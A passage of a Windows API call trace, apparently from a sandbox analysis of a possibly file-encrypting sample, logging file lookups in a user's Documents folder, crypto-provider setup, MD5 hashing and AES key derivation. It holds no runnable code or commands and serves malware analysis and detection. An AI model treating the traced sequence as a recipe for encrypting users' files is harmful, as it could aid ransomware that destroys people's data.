PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.142] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.144] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.144] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\s_Uc9.pdf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d177b70, ftCreationTime.dwHighDateTime=0x1d5b5f8, ftLastAccessTime.dwLowDateTime=0x3287bd80, ftLastAccessTime.dwHighDateTime=0x1d5c359, ftLastWriteTime.dwLowDateTime=0x3287bd80, ftLastWriteTime.dwHighDateTime=0x1d5c359, nFileSizeHigh=0x0, nFileSizeLow=0x373c, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="s_Uc9.pdf", cAlternateFileName="")) returned 0x7c2240 [0035.145] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.145] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.145] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.145] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.145] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.145] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.145] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.145] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.145] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.145] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.145] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.145] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.145] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.145] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.146] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0035.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.146] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0035.147] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.147] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.147] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.147] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.147] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.147] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.148] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.148] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.148] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.148] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.148] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.148] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.148] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.148] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.148] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.148] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.149] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.149] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.149] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.149] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.150] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.150] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.150] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.150] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.151] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0035.152] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.153] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.154] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0035.154] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.154] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.154] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.154] RtlAllocateHeap 